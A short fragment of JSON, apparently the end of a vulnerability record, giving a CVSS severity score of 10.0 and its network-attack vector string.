"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}